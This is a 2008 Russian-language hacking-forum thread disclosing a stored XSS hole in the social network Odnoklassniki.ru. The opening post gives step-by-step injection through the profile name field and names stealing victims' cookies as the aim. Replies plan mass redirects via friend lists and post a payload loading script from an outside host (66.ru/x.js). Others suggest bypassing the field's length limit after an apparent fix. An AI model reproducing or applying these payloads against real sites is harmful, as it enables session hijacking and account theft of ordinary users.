Odnoklassniki.ru

Discussion in 'Уязвимости' started by banned, 21 Mar 2008.

  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    [​IMG]

    [Intro]

    Спустя 10 минут после регистрации на odnoklassniki.ru, была найдена активная xss...
    Собственно регистрация для этого и была произведена :)
    Что с неё взять?
    -Конечно cookies (Не печенье).
    Такой баг на огромнейшей соц.сети может вызвать п.зд.ц
    К чему я все...начнем...​

    [Vulnerability]

    Авторизуемся на сайте http://odnoklassniki.ru, если нет акка, пройдите 2х минутную авторизацию.
    Далее проходим на свою личную страницу -> Основное -> Редактировать личные данные ->
    (*.odnoklassniki.ru/dk?st.cmd=userSelfProfileEdit)
    Ваше имя - <script>alert(/1/)</script>
    Сохранить.
    Переходим в "Форум" (*.odnoklassniki.ru/dk?st.cmd=userForum) -> Добавить -> Уже видна активка, но это не то :)
    Пишем что-нибудь в сообщении -> Добавить
    Переходим в свой форум -> Клацаем по ссылке "Написать сообщение" (далее [1]) ->
    Ну и вот она активная xss :)

    //Везде на вашей странице где есть сылка "Написать сообщение" + кликнув по ней будет активная xss
    //будь то "Друзья" , "Друзья друзей", Сообщества" ...везде​

    [Application]

    Жертве необходимо быть авторизованным на сайте и всего перейти по вашей ссылке [1] где и будет произведен ваш js код...
    Желаю удачи​

    [Video]

    ROFL, http://www.x3k.name/odnoklassniki.ru[active.xss]-Isis.rar​

    [Copyright]

    © by Isis 13.03.2008, xeka.ru
    Greetz to: gemaglabin, blackybr, +toxa+, ettee, b00zy_c0d3r, NOFEAR, Rebz, Barsik, c411k, Elekt, ettee, .fuf, lamarez, cash, limpompo, madnet, Great, podkashey, KEZ, GreenBear, w1z, m0nzt3r, PEPSICOLA :D, Puff, Proteus and other....​
     
    12 people like this.
  2. SchmeL

    SchmeL Elder - Старейшина

    Joined:
    16 Jun 2007
    Messages:
    64
    Likes Received:
    38
    Reputations:
    5
    тепрь все зависит от времени, кто быстрее...пока не прикрыли.
    З.Ы допустим есть чел с 600 друзьями, друзья друзей более 3000. возможноли туда впихнуть редирект или банер рекламный какой на сайт?
     
  3. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    129
    Likes Received:
    25
    Reputations:
    -1
    там же для воровства кук скрипт не вмещается :/
     
    1 person likes this.
  4. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    КИНГ, Если перечитать статью и подумать?
     
    2 people like this.
  5. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    мда )))) ты еще сайт открой и форум с платной булкой поставь, чтобы посвятить крутую хсс ))))))))))))))))))))))))))))) достаточно в знакомый до боли раздел пихнуть -)
     
    3 people like this.
  6. Cawabunga

    Cawabunga Elder - Старейшина

    Joined:
    16 Apr 2007
    Messages:
    359
    Likes Received:
    165
    Reputations:
    -22
    хм а как по поводу сайта ? кссоднаклассники.ру :)
     
  7. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    isis , а ты не заметил еще одну?
    когда человек будет писать в личку тому у кого стоит скрип вместо имени, то тоже он исполнится.
     
  8. Cawabunga

    Cawabunga Elder - Старейшина

    Joined:
    16 Apr 2007
    Messages:
    359
    Likes Received:
    165
    Reputations:
    -22
    ксс2однаклассники.ру ? : ))
     
    1 person likes this.
  9. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    <script src=http://66.ru/x.js></script>
     
    1 person likes this.
  10. z0diak

    z0diak New Member

    Joined:
    11 Jan 2008
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Если не сложно,дайте ссылки как правильно использовать активные Xss. Что-нибуть приближенное к данной статье.. . Заранее спасибо.
     
  11. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    2z0diak
    может еще статью написать "использование поисковиков для маленьких или как найти нужную инфу" ?
     
    1 person likes this.
  12. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Начни отсюда:
    http://old.antichat.ru/crackchat/HTML/
    To [aywo] - вместо набора слов мог бы и помочь человеку.
     
  13. z0diak

    z0diak New Member

    Joined:
    11 Jan 2008
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Попробуй,может выйдет.....Желаю творческого вдохновения. Напишешь с меня +++
     
    #13 z0diak, 27 Mar 2008
    Last edited: 27 Mar 2008
  14. z0diak

    z0diak New Member

    Joined:
    11 Jan 2008
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Спасибо.....
     
  15. Bo_om

    Bo_om New Member

    Joined:
    29 Jul 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Похоже, что дырку закрыли! :(
    script не помещается в окошко по длине...
    Есть ещё какие-нибудь идеи?
     
  16. DjFly

    DjFly New Member

    Joined:
    1 Oct 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Да, увы очень жаль, в строке ввода имени вмещается всего 16 символов.
    А вдруг у меня имя двадцать символов??))
     
  17. Kila

    Kila Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    0
    Likes Received:
    44
    Reputations:
    -1
    Тогда ты неудачнеГ :D
     
  18. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Ну, если в поле ввода не вмещается, можно попробовать подредактировать сорсы страницы и изменить параметр maxlength! ;) Если конечно дальше скриптом не обрезается!
     
  19. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Дальше скриптом обрезается...
     
  20. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    оно ещё работает ?)